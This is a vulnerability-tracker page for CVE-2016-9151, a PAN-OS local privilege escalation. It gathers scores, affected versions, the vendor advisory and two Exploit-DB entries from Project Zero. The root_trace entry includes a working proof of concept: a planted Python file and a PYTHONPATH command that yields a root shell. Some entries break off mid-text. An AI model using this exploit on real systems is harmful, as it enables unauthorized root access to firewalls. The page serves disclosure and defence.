CVE-2016-9151
published 2016-11-19CVE-2016-9151: Palo Alto Networks PAN-OS before 5.0.20, 5.1.x before 5.1.13, 6.0.x before 6.0.15, 6.1.x before 6.1.15, 7.0.x before 7.0.11, and 7.1.x before 7.1.6 allows…
PriorityP346high7.8CVSS 3.0
AVLACLPRLUINSUCHIHAH
EXPLOIT
EPSS
1.21%
64.5th percentile
Palo Alto Networks PAN-OS before 5.0.20, 5.1.x before 5.1.13, 6.0.x before 6.0.15, 6.1.x before 6.1.15, 7.0.x before 7.0.11, and 7.1.x before 7.1.6 allows local users to gain privileges via crafted values of unspecified environment variables.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| paloalto | pan-os | — | — |
| paloaltonetworks | pan-os | >= 5.0.0 < 5.0.20 | 5.0.20 |
| paloaltonetworks | pan-os | >= 5.1 < 5.1.13 | 5.1.13 |
| paloaltonetworks | pan-os | >= 6.0.0 < 6.0.15 | 6.0.15 |
| paloaltonetworks | pan-os | >= 6.1.0 < 6.1.15 | 6.1.15 |
| paloaltonetworks | pan-os | >= 7.0.0 < 7.0.11 | 7.0.11 |
| paloaltonetworks | pan-os | >= 7.1.0 < 7.1.6 | 7.1.6 |
CVSS provenance
nvdv3.07.8HIGHCVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.04.6MEDIUMAV:L/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Palo Alto
Local Privilege Escalation
vendor_paloalto·2016-11-17·CVSS 7.8
CVE-2016-9151 [HIGH] CWE-264 Local Privilege Escalation
Local Privilege Escalation
Palo Alto Networks firewalls do not properly validate certain environment variables which can potentially allow executing code with higher privileges (Ref # PAN-61104/100499/CVE-2016-9151)
A potential attacker with local shell access could manipulate arbitrary environment variables which could result in a process running with higher privileges.
This issue affects PAN-OS 5.0.19 and earlier; PAN-OS 5.1.12 and earlier; PAN-OS 6.0.14 and earlier; PAN-OS 6.1.14 and earlier; PAN-OS 7.0.10 and earlier; PAN-OS 7.1.5 and earlier
Affected products: PAN-OS
Solution: PAN-OS 5.0.20 and later; PAN-OS 5.1.13 and later; PAN-OS 6.0.15 and later; PAN-OS 6.1.15 and later; PAN-OS 7.0.11 and later; PAN-OS 7.1.6 and later
Workaround: Exploitation of this privilege escalation is re
GHSA
GHSA-48jw-g6cj-24gw: Palo Alto Networks PAN-OS before 5
ghsa_unreviewed·2022-05-13
CVE-2016-9151 [HIGH] GHSA-48jw-g6cj-24gw: Palo Alto Networks PAN-OS before 5
Palo Alto Networks PAN-OS before 5.0.20, 5.1.x before 5.1.13, 6.0.x before 6.0.15, 6.1.x before 6.1.15, 7.0.x before 7.0.11, and 7.1.x before 7.1.6 allows local users to gain privileges via crafted values of unspecified environment variables.
No detection rules found.
Exploit-DB
Palo Alto Networks PanOS - 'root_reboot' Local Privilege Escalation
exploitdb·2016-11-18
CVE-2016-9151 Palo Alto Networks PanOS - 'root_reboot' Local Privilege Escalation
Palo Alto Networks PanOS - 'root_reboot' Local Privilege Escalation
---
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=913
This was fixed by PAN: http://securityadvisories.paloaltonetworks.com/Home/Detail/67
The root_reboot utility is setuid root, but performs multiple calls to system() with attacker controlled data, such as this one:
.text:0804870F C7 44 24 04 78+ mov dword ptr [esp+4], offset aUsrLocalBinPan ; "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 "...
.text:08048717 89 04 24 mov [esp], eax ; char **
.text:0804871A E8 0D FE FF FF call _asprintf
.text:0804871F 8B 45 E8 mov eax, [ebp+new]
.text:08048722 85 C0 test eax, eax
.text:08048724 0F 84 B9 01 00+ jz loc_80488E3
.text:0804872A 89 04 24 mov [esp], eax ; command
.text:0804872D E8 9A FD FF FF call _system
Which
Exploit-DB
Palo Alto Networks PanOS - 'root_trace' Local Privilege Escalation
exploitdb·2016-11-18
CVE-2016-9151 Palo Alto Networks PanOS - 'root_trace' Local Privilege Escalation
Palo Alto Networks PanOS - 'root_trace' Local Privilege Escalation
---
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912
The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script:
$ ls -l /usr/local/bin/root_trace
-rwsr-xr-x 1 root root 12376 Oct 17 2014 /usr/local/bin/root_trace
As the environment is not scrubbed, you can just do something like this:
$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0);
$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
This was fixed by PAN:
http://securityadvisories.paloaltonetworks.com/Home/Detail/67
No writeups or analysis indexed.
http://www.securityfocus.com/bid/94400http://www.securitytracker.com/id/1037381https://security.paloaltonetworks.com/CVE-2016-9151https://www.exploit-db.com/exploits/40788/https://www.exploit-db.com/exploits/40789/http://www.securityfocus.com/bid/94400http://www.securitytracker.com/id/1037381https://security.paloaltonetworks.com/CVE-2016-9151https://www.exploit-db.com/exploits/40788/https://www.exploit-db.com/exploits/40789/
2016-11-19
Published